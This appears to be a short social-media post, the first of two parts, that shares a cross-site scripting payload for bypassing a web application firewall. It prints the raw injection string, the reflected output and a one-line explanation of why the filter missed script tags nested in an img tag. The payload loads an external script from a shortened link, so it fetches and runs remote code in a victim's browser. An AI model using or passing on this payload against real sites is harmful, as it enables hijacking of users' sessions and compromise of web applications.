XSS WAF Bypass:

<img+a=’a+<!–‘+a=”>”‘+”<script+a+src=https://t.co/AL1o0uYD9w>a</script>

Reflected as:
<img a=’a <!–‘ a=\”>\”‘ \”<script a src=https://t.co/AL1o0uYD9w>a</script>

Explanation: Script tags don’t work inside a <img> tags so the WAF was allowing me to add them 1/2